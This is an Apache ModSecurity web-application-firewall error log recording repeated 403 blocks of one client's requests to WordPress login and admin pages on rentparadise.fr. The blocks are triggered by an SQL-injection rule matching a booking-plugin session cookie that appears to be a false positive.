[Mon May 11 22:27:33.342882 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7tXo_DFxNSZVmaX3Q3QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:33.343183 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7tXo_DFxNSZVmaX3Q3QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:33.917118 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7tXo_DFxNSZVmaX3Q3QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:34.464545 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7tno_DFxNSZVmaX3Q5AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:34.464825 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7tno_DFxNSZVmaX3Q5AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:35.017036 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7tno_DFxNSZVmaX3Q5AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:35.228653 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7t3o_DFxNSZVmaX3Q5wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:35.228947 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7t3o_DFxNSZVmaX3Q5wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:35.598831 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7t3o_DFxNSZVmaX3Q5wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:36.423455 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7uHo_DFxNSZVmaX3Q7gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:36.423737 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7uHo_DFxNSZVmaX3Q7gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:37.038302 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7uHo_DFxNSZVmaX3Q7gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:40.923294 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7vHo_DFxNSZVmaX3RAQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:40.923552 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7vHo_DFxNSZVmaX3RAQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:41.526443 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7vHo_DFxNSZVmaX3RAQAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:43.234908 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7v3o_DFxNSZVmaX3RDAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:43.235205 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7v3o_DFxNSZVmaX3RDAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:43.844223 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7v3o_DFxNSZVmaX3RDAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:45.424226 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7wXo_DFxNSZVmaX3RFgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:45.424511 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7wXo_DFxNSZVmaX3RFgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:45.968188 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7wXo_DFxNSZVmaX3RFgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:45.983751 2026] [security2:error] [pid 1606352:tid 1606438] [client 5.181.131.41:59017] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI7wXo_DFxNSZVmaX3RGQAAANM"], referer: https://www.piregwan-genesis.com/
[Mon May 11 22:27:46.257675 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7wno_DFxNSZVmaX3RGwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:46.257976 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7wno_DFxNSZVmaX3RGwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:46.837694 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7wno_DFxNSZVmaX3RGwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:47.323089 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7w3o_DFxNSZVmaX3RHwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:47.323386 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7w3o_DFxNSZVmaX3RHwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:47.690622 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7w3o_DFxNSZVmaX3RHwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:48.655180 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7xHo_DFxNSZVmaX3RJgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:48.655468 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7xHo_DFxNSZVmaX3RJgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:49.282190 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7xHo_DFxNSZVmaX3RJgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:50.149730 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7xno_DFxNSZVmaX3RLAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:50.150017 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7xno_DFxNSZVmaX3RLAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:50.738370 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7xno_DFxNSZVmaX3RLAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:27:51.934853 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7x3o_DFxNSZVmaX3RMQAAAMg"], referer: https://rentparadise.fr/wp-login.php
